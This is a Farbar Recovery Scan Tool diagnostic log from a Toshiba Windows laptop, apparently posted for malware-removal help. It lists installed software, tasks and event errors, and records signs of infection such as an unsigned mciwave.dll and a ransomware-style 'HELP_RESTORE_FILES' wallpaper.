2015-05-10 14:08 - 2014-09-10 00:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2015-05-09 23:02 - 2013-08-22 16:36 - 00000000 ____D () C:\Windows\AppReadiness
2015-05-09 22:46 - 2014-03-18 09:13 - 00036804 _____ () C:\Windows\PFRO.log
2015-05-09 22:46 - 2013-08-22 14:25 - 00262144 ___SH () C:\Windows\system32\config\BBI
2015-05-09 22:45 - 2015-02-26 01:33 - 00333754 _____ () C:\Users\Public\CAFADEBUG.log
2015-05-08 07:41 - 2015-02-26 01:36 - 00000000 ____D () C:\Users\Public\CyberLink
2015-05-08 07:41 - 2013-08-22 16:36 - 00000000 __RHD () C:\Users\Public\Libraries
2015-05-07 21:00 - 2015-02-26 01:43 - 00000000 ____D () C:\ProgramData\WildTangent
2015-05-07 21:00 - 2015-02-26 01:33 - 00000000 ____D () C:\ProgramData\Temp
2015-05-07 21:00 - 2015-02-26 01:33 - 00000000 ____D () C:\ProgramData\install_clap
2015-05-07 21:00 - 2015-02-26 01:33 - 00000000 ____D () C:\ProgramData\CyberLink
2015-05-07 21:00 - 2015-02-26 01:14 - 00000000 ____D () C:\ProgramData\SRS Labs
2015-05-07 21:00 - 2015-02-26 01:11 - 00000000 ____D () C:\ProgramData\Conexant
2015-05-07 21:00 - 2015-02-26 01:06 - 00000000 ____D () C:\ProgramData\Intel
2015-05-07 21:00 - 2014-09-10 00:41 - 00000000 ____D () C:\ProgramData\WinZip
2015-05-07 21:00 - 2014-09-10 00:40 - 00000000 ____D () C:\ProgramData\Skype
2015-05-07 21:00 - 2014-09-10 00:25 - 00000000 ____D () C:\ProgramData\TOSHIBA
2015-05-07 20:59 - 2015-02-26 01:06 - 00000000 ____D () C:\Intel
2015-05-07 20:59 - 2014-09-11 00:40 - 00000000 ____D () C:\Toshiba
2015-05-07 19:14 - 2013-08-22 16:20 - 00000000 ____D () C:\Windows\CbsTemp
2015-05-06 19:06 - 2013-08-22 16:36 - 00000000 ____D () C:\Windows\system32\migwiz
2015-05-06 07:56 - 2013-08-22 15:46 - 00019012 _____ () C:\Windows\setupact.log
2015-05-06 07:40 - 2014-05-06 08:45 - 00738132 _____ () C:\Windows\system32\perfh01D.dat
2015-05-06 07:40 - 2014-05-06 08:45 - 00156256 _____ () C:\Windows\system32\perfc01D.dat
2015-05-06 07:40 - 2014-05-06 08:24 - 00454216 _____ () C:\Windows\system32\perfh014.dat
2015-05-06 07:40 - 2014-05-06 08:24 - 00081138 _____ () C:\Windows\system32\perfc014.dat
2015-05-06 07:40 - 2014-05-06 08:03 - 00439822 _____ () C:\Windows\system32\perfh00B.dat
2015-05-06 07:40 - 2014-05-06 08:03 - 00085674 _____ () C:\Windows\system32\perfc00B.dat
2015-05-06 07:40 - 2014-05-06 07:43 - 00469124 _____ () C:\Windows\system32\perfh006.dat
2015-05-06 07:40 - 2014-05-06 07:43 - 00083646 _____ () C:\Windows\system32\perfc006.dat
2015-05-06 07:40 - 2014-03-18 16:25 - 03290732 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-05-05 14:00 - 2015-02-26 01:41 - 00002232 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk
2015-05-04 21:27 - 2015-02-26 01:53 - 00000000 ____D () C:\ProgramData\McAfee
2015-05-04 18:52 - 2015-02-26 01:53 - 00000000 ____D () C:\Program Files (x86)\McAfee
2015-05-04 18:29 - 2015-02-26 01:53 - 00000000 ____D () C:\Program Files\Common Files\McAfee
2015-05-04 18:28 - 2013-08-22 16:36 - 00000000 ___HD () C:\Windows\ELAMBKUP
2015-05-04 17:58 - 2013-08-22 16:36 - 00000000 ____D () C:\Windows\system32\restore
2015-05-04 17:58 - 2013-08-22 16:36 - 00000000 ____D () C:\Windows\rescache
==================== Files in the root of some directories =======
2015-05-07 19:39 - 2015-05-08 07:42 - 0247398 _____ () C:\Users\Nick\AppData\Local\log.html
2015-05-07 19:39 - 2015-05-08 07:42 - 0000752 _____ () C:\Users\Nick\AppData\Local\storage.bin
2015-05-06 19:32 - 2015-05-06 19:34 - 0000153 _____ () C:\Users\Nick\AppData\Local\svcxdcl32.dat
Some files in TEMP:
====================
C:\Users\Nick\AppData\Local\Temp\i4jdel0.exe
C:\Users\Nick\AppData\Local\Temp\i4jdel1.exe
C:\Users\Nick\AppData\Local\Temp\PPCC_Stub.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-09-09 23:59
==================== End of log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-05-2015 01
Ran by Nick at 2015-05-28 21:50:43
Running from C:\Users\Nick\Desktop
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3762328459-3212051721-594648359-500 - Administrator - Disabled)
Guest (S-1-5-21-3762328459-3212051721-594648359-501 - Limited - Disabled)
Nick (S-1-5-21-3762328459-3212051721-594648359-1001 - Administrator - Enabled) => C:\Users\Nick
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Amazon 1Button App (HKLM-x32\...\{38103AAA-83CB-4540-B206-56800AE60A36}) (Version: 2.2.1 - Amazon)
Apple Application Support (32-bit) (HKLM-x32\...\{AFA1153A-F547-409B-B837-3A0D6C5A3FEC}) (Version: 3.1.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{D7B824DE-DA32-4772-9E5E-39C5158136A7}) (Version: 3.1.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C4123106-B685-48E6-B9BD-E4F911841EB4}) (Version: 8.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bejeweled 3 (x32 Version: 3.0.2.59 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 6.30.223.227 - Broadcom Corporation)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.65.38.57 - Conexant)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.4328.05 - CyberLink Corp.)
DTS Sound (HKLM-x32\...\{BC95D4AF-4DAC-4350-8BCE-C8BF16A13AE0}) (Version: 1.01.8800 - DTS, Inc.)
Enchanted Cavern 2 (x32 Version: 2.2.0.110 - WildTangent) Hidden
Evernote v. 5.4 (HKLM-x32\...\{59071464-DAEE-11E3-9080-00163E98E7D0}) (Version: 5.4.0.3698 - Evernote Corp.)
Google Drive (HKLM-x32\...\{35574F09-89F9-4B16-B69B-64F3E25901B8}) (Version: 1.21.9226.6034 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.21.115 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.27.5 - Google Inc.) Hidden
Intel® Chipset Device Software (x32 Version: 10.0.13 - Intel® Corporation) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3408 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
iTunes (HKLM\...\{93F2A022-6C37-48B8-B241-FFABD9F60C30}) (Version: 12.1.2.27 - Apple Inc.)
King Oddball (x32 Version: 3.0.2.48 - WildTangent) Hidden
Magic Academy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Artifacts (x32 Version: 2.2.0.110 - WildTangent) Hidden
McAfee LiveSafe – Internet Security (HKLM-x32\...\MSC) (Version: 13.6.1599 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
My Kingdom for the Princess 3 (x32 Version: 2.2.0.110 - WildTangent) Hidden
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 3.0.2.59 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Pro PC Cleaner (HKLM-x32\...\{C3060724-6AC7-4BEF-B516-4F6B1D90887D}) (Version: 2.5.5.43 - Pro PC Cleaner)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29077 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Skype™ 6.18 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.18.105 - Skype Technologies S.A.)
Spotify (HKLM-x32\...\Spotify) (Version: 0.8.5.1333.g822e0de8 - Spotify AB)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1186 - SUPERAntiSpyware.com)
Symbaloo (HKLM-x32\...\Symbaloo) (Version: 1.0.0 - Symbaloo Launcher by Toshiba Europe GmbH)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.3.0 - Synaptics Incorporated)
TOSHIBA Desktop Assist (HKLM\...\{C4CDCEF0-0A7A-4425-887C-33E39533D758}) (Version: 1.03.06.6403 - Toshiba Corporation)
TOSHIBA Display Utility (HKLM\...\{484A4296-6F3D-4182-8CFA-D664F7DA34AA}) (Version: 1.1.17.0 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{94D2A899-0C34-4420-880E-AE337E635AB0}) (Version: 2.5.3.6401 - Toshiba Corporation)
TOSHIBA Function Key (HKLM\...\{1844CFE2-EBA3-490A-8A5E-9BFC646342FD}) (Version: 1.1.5.6402 - Toshiba Corporation)
TOSHIBA Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version: 10.19 - TOSHIBA)
TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{26BB68BB-CF93-4A12-BC6D-A3B6F53AC8D9}) (Version: 6.0.9.0 - Toshiba Corporation)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 3.01.02.6400 - Toshiba Corporation)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 3.2.00.56006005 - Toshiba Corporation)
TOSHIBA Service Station (HKLM\...\{BFE4C813-4DD4-4B1C-97F4-76A459055C8D}) (Version: 2.6.13 - Toshiba Corporation)
TOSHIBA Start Screen Option (HKLM\...\{06B71035-F19F-4F76-9875-FFCCD4FC3F83}) (Version: 1.00.01.6402 - Toshiba Corporation)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0033 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{4D57ED72-6B01-40BD-9CA9-012B8FC09CEB}) (Version: 2.0.1.32003 - Toshiba Corporation)
Toshiba TEMPRO (HKLM-x32\...\{F76F5214-83A8-4030-80C9-1EF57391D72A}) (Version: 4.6.0 - Toshiba Europe GmbH)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Virtual Villagers 5 - New Believers (x32 Version: 3.0.2.32 - WildTangent) Hidden
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.6.0.0 - Azureus Software, Inc.)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (Toshiba Games) (x32 Version: 4.0.11.9 - WildTangent) Hidden
WinZip 18.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E3}) (Version: 18.5.11111 - WinZip Computing, S.L. )
Youda Jewel Shop (x32 Version: 3.0.2.51 - WildTangent) Hidden
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3762328459-3212051721-594648359-1001_Classes\CLSID\{2D349E57-23E4-4A67-9624-F1DC6B65AABF}\InprocServer32 -> C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\mciwave.dll ()
==================== Restore Points =========================
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 14:25 - 2013-08-22 14:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {1F1BECC9-3614-468A-8876-6F4C51B59B3C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-09-10] (Google Inc.)
Task: {42BCBC3A-62B9-41F6-A7FB-2EE3ABA89915} - System32\Tasks\TOSHIBA\Service Station => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe [2013-09-24] (TOSHIBA Corporation)
Task: {9C2F5E4D-C6C0-45D1-AA65-3EC3341E14AE} - System32\Tasks\ProPCCleaner_Popup => C:\Program Files (x86)\Pro PC Cleaner\Splash.exe [2014-07-03] () <==== ATTENTION
Task: {B890031B-056F-40AE-AEB1-1D74DA247767} - System32\Tasks\dts_apo_service_task => C:\Program Files (x86)\DTS, Inc\DTS Studio Sound\dts_apo_task.exe [2014-06-04] ()
Task: {ED70E7EA-27EE-41AC-80A9-933D4D9F9941} - System32\Tasks\ProPCCleaner_Start => C:\Program Files (x86)\Pro PC Cleaner\ProPCCleaner.exe [2014-07-03] (Pro PC Cleaner) <==== ATTENTION
Task: {EDBB662C-9A38-409A-B1DC-FB9C8E3C3E5A} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAA1A839-2E55-428A-A20E-3FF505D8461A} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2014-02-21] (Synaptics Incorporated)
Task: {FBDC4097-6B9E-4E0A-9902-6632FD600E36} - System32\Tasks\Toshiba\CommonNotifier => C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.exe [2014-08-05] (Toshiba Europe GmbH)
Task: {FBE12B9C-644D-49A3-8F63-B058AE69F6F3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-09-10] (Google Inc.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Loaded Modules (Whitelisted) ==============
2015-03-20 18:12 - 2015-03-20 18:12 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-03-20 18:12 - 2015-03-20 18:12 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-05-06 19:06 - 2015-05-07 18:38 - 00259536 _____ () C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\mciwave.dll
2014-06-30 12:11 - 2014-06-30 12:11 - 00021840 _____ () C:\Program Files (x86)\DTS, Inc\DTS Studio Sound\dts_apo_service.exe
2012-07-18 19:38 - 2012-07-18 19:38 - 00020904 _____ () C:\Program Files\TOSHIBA\Hotkey\SmoothView.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\Nick\OneDrive:ms-properties
==================== Safe Mode (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-3762328459-3212051721-594648359-1001\...\amazon.co.uk -> amazon.co.uk
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nick\Desktop\HELP_RESTORE_FILES.bmp
DNS Servers: 192.168.1.254
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{41E94444-1569-4B0D-99E9-1F19808D8CA5}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{6480E709-2617-47F2-92C4-4F31DF7A6DE4}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{D5B7140A-4485-4819-8D23-94E6519DA615}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{FCFEE1F3-C806-439D-A7D2-BA82C5F9386B}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{25BD671D-D673-49C4-8672-B6B7D92FBB31}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD Cinema\PowerDVDCinema12.exe
FirewallRules: [{E93792E9-A539-4CE9-9AAA-AF4DEAC115B3}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{2554CA4E-6D0D-46DC-B543-7E0A3B3D9FA3}] => (Allow) C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{C351B5FE-8A68-4FBC-8392-7A091796A84C}] => (Allow) C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{35C771B8-F787-45B9-9B7E-DB67FA259C7C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1AA437FB-9805-41C7-AF8D-CB32FBA65B38}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5A5576BF-DD69-4F03-BD37-4F0F76ED2311}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{CBB563AD-3DFB-4D77-A9F1-CE671C9682D4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{691D2889-7B1B-4A16-8A8A-28F8117B3116}] => (Allow) C:\Program Files\iTunes\iTunes.exe
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (05/21/2015 00:50:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 30406
Error: (05/21/2015 00:50:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 30406
Error: (05/21/2015 00:50:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (05/21/2015 00:50:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15063
Error: (05/21/2015 00:50:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15063
Error: (05/21/2015 00:50:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (05/20/2015 10:49:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 16078
Error: (05/20/2015 10:49:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 16078
Error: (05/20/2015 10:49:26 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (05/20/2015 09:49:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 369594
System errors:
=============
Error: (05/20/2015 09:54:28 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: The system detected an address conflict for IP address 192.168.1.79 with the system
having network hardware address B8-27-EB-6F-B2-AB. Network operations on this system may
be disrupted as a result.
Error: (05/20/2015 09:49:26 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: The system detected an address conflict for IP address 192.168.1.79 with the system
having network hardware address B8-27-EB-6F-B2-AB. Network operations on this system may
be disrupted as a result.
Error: (05/20/2015 08:16:46 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}
Error: (05/20/2015 08:14:42 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: The system detected an address conflict for IP address 192.168.1.79 with the system
having network hardware address 00-26-5A-20-17-D6. Network operations on this system may
be disrupted as a result.
Error: (05/20/2015 08:09:08 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 08:01:53 on 20/05/2015 was unexpected.
Error: (05/20/2015 08:07:48 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The McAfee VirusScan Announcer service did not respond on starting.
Error: (05/20/2015 08:01:53 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 02:00:33 on 11/05/2015 was unexpected.
Error: (05/10/2015 08:00:40 PM) (Source: DCOM) (EventID: 10010) (User: NICKSLAPTOP)
Description: {209500FC-6B45-4693-8871-6296C4843751}
Error: (05/10/2015 04:11:12 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: A fatal alert was received from the remote endpoint. The TLS protocol defined fatal alert code is 20.
Error: (05/10/2015 08:49:40 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {ADA518B9-B7A3-4C36-B4ED-49EB3FA189FC}
Microsoft Office:
=========================
Error: (05/21/2015 00:50:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 30406
Error: (05/21/2015 00:50:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 30406
Error: (05/21/2015 00:50:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (05/21/2015 00:50:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15063
Error: (05/21/2015 00:50:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15063
Error: (05/21/2015 00:50:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (05/20/2015 10:49:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 16078
Error: (05/20/2015 10:49:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 16078
Error: (05/20/2015 10:49:26 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (05/20/2015 09:49:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 369594
CodeIntegrity Errors:
===================================
Date: 2015-05-20 20:31:22.693
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\mciwave.dll that did not meet the Windows signing level requirements.
Date: 2015-05-10 16:18:05.836
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\mciwave.dll that did not meet the Windows signing level requirements.
Date: 2015-05-10 14:05:17.057
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\mciwave.dll that did not meet the Windows signing level requirements.
Date: 2015-05-10 14:04:50.066
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\mciwave.dll that did not meet the Windows signing level requirements.
Date: 2015-05-07 18:21:33.465
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\mciwave.dll that did not meet the Windows signing level requirements.
Date: 2015-05-07 18:21:07.271
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\mciwave.dll that did not meet the Windows signing level requirements.
==================== Memory info ===========================
Processor: Intel® Pentium® CPU N3540 @ 2.16GHz
Percentage of memory in use: 55%
Total physical RAM: 3978.95 MB
Available physical RAM: 1753.55 MB
Total Pagefile: 7434.95 MB
Available Pagefile: 4389.69 MB
Total Virtual: 131072 MB
Available Virtual: 131071.8 MB
==================== Drives ================================
Drive c: (TI31381700A) (Fixed) (Total:686.59 GB) (Free:578.22 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 00000000)
Partition: GPT Partition Type.
==================== End of log ============================